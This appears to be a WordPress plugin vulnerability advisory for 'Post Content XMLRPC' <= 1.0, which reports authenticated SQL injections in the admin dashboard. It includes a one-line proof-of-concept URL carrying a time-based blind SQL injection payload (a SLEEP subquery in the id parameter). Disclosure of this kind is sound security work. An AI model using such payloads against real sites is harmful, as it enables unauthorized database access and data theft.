WordPress Plugin Vulnerabilities
Post Content XMLRPC <= 1.0 - Admin+ SQL Injections
Description
The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections
Proof of Concept
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)